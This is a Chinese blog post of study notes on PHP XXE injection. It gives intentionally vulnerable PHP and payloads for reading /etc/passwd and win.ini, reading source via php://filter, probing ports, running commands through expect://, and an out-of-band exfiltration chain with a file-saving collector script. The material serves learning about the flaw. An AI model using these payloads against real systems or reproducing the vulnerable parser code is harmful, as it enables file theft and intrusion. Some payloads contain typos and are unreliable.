XXE漏洞

于 2023-04-13 22:28:38 发布
阅读量167 收藏
点赞数
分类专栏: 暗月笔记 文章标签: php 服务器 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RMC131/article/details/130141865
版权

XXE

XXE Injection,XML Enternal Entity Injection, 由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。

条件:libxml< 2.9.1原因是 libxml2.9.1及以后,默认不解析外部实体。

内部实体

程序中多用内部实体

<!ENTITY 实体名称"实体的值">
<?xml version="1.0" encoding="IOS"

外部实体

<!ENTITY 实体名称 SYSTEM "URI/URL">

例子:

xxe.php

<?php
$string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml实体注入</body></note>';
$xml = isset($_GET['xml'])?$_GET['xml']:$string_xml;
$data = simplexml_load_string($xml);
echo  '<meta charset="UTF-8">';
print_r($data);
?>

xxe02.php

<?php
$xml = $_GET['xml'];
$data = simplexml_load_string($xml);
?>

有回显

都需要先url编码

http://127.0.0.1/xxe.php?xml=...

任意读取文件

Windows下
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">]><c>&b;</c>

linux下
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]><c>&b;</c>

php种利用伪协议读取文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phpinfo.php" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

扫描端口

<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM "http://192.168.0.1:80">]>
<abc>&test;</abc>

执行命令

需开启expect扩展
<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM "expect://whoami">]>
<abc>&test;</abc>

无回显

(未实现)

称为blind xxe可以使用外带数据通道 提取数据

http://127.0.0.1/xxe02.php?xml=<?xml version="1.0"?>
<!DOCTYPE ANY[
    <!ENTITY % file SYSTEM "file:///C:1.txt">
    <!ENTITY % remote SYSTEM "http://127.0.0.1/evil.xml">
    %remote;
    %all;
]>
<root>&send;</root>

ecil.xml内容

<!ENTITY %all "<!ENTITY send SYSTEM 'http://127.0.0.1/1.php?file;'>">

1.php

<?php file_put_contents("1.txt", $_GET['file']);?>
RICKC131
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解
最新发布
weixin_59047731的博客
12-14 123
是可以控制的,因为就是前端传进来的post值,被GLOBALS解析了一下而已,同时传进来的值我们可以抓包进行控制。因为现在输入是可以控制的,所以我们只需要找可以产生回显点的地方,对应到代码,就是找输出数据的地方。因为我们在后续的代码中并没有发现任何输出点,所以这个时候就要尝试xxe的盲注。这里可以看出,id=1和id=2是同一个文件,就没必要重复查看了。id=4 id=5是同一个文件,同一个位置,查看一个即可。此时会发现是两条两条记录的出现,原因可以参考一下图片。双击进入id=3,出现错误,我们也不用管。
XXE漏洞分析
jklbnm12的博客
09-17 435
0x01:知识准备 XXE即XML External Entity Injection,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml\\\_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml\\\_load_string() XML实体分为四种:字符实体,命名实体,外部实体,参数实体 1、命名实体写法: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE
xxe漏洞简介
u011066706的专栏
04-17 4123
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
(vulhub)PHP环境XML外部实体注入漏洞XXE
Gjqhs的博客
03-08 1019
Vulhub 靶场安装_Gjqhs的博客-CSDN博客 查询对应镜像 打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像,(有可能超时,如下) 启动xxe服务 访问即可见此页面,可看到其版本为2.8.0。 http:...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
SCAN_XXE:利用XML XXE漏洞
05-07
在"SCAN_XXE:利用XML XXE漏洞"的主题中,我们将深入探讨这一安全威胁及其防范措施。 XML是可扩展标记语言(eXtensible Markup Language),广泛用于数据交换和配置文件。XML解析器在处理文档时,会识别并处理实体...
第三节 简单XXE漏洞代码编写-01
09-15
XXE漏洞代码编写详解 XXE漏洞(XML External Entity),是一种常见的安全漏洞,攻击者可以通过构造恶意的XML数据,来访问服务器上的敏感信息。下面我们将详细介绍XXE漏洞的代码编写。 file_get_content函数介绍 ...
php xxe注入,PHP XXE漏洞
weixin_33764463的博客
03-10 464
PHP xml 外部实体注入漏洞(XXE)1.环境PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用2.原理介绍XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息...
PHP XXE漏洞
weixin_30849591的博客
01-24 1088
PHP xml 外部实体注入漏洞XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
XXE漏洞介绍及利用
星落的博客
06-11 9898
XXE漏洞介绍 XXE全称为XML External Entity Injection即XMl外部实体注入漏洞XXE漏洞 XXE漏洞触发点往往是可以上传xmlwenjian的位置,没有对xml文件进行过滤,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害 XML介绍及用途 XMl被设计用来传输和存储数据。XML文档形成了一种树状结构,它从"根部"开始,然后扩展到"枝叶"。 XMl允许作者定义自己的标签和自己的文档结构。 XML.
PHP XXE漏洞测试实践
Ambulong的博客
06-04 4542
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。当允许引用外部实体时,攻击者可通过构造恶意的XML内容,进行读取任意文件、执行系统命令、探测内网端口、攻击内网网站等操作。VulnSpy提供了PHP XXE的在线演示实验,我们可以直接在线对XXE漏洞进行...
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值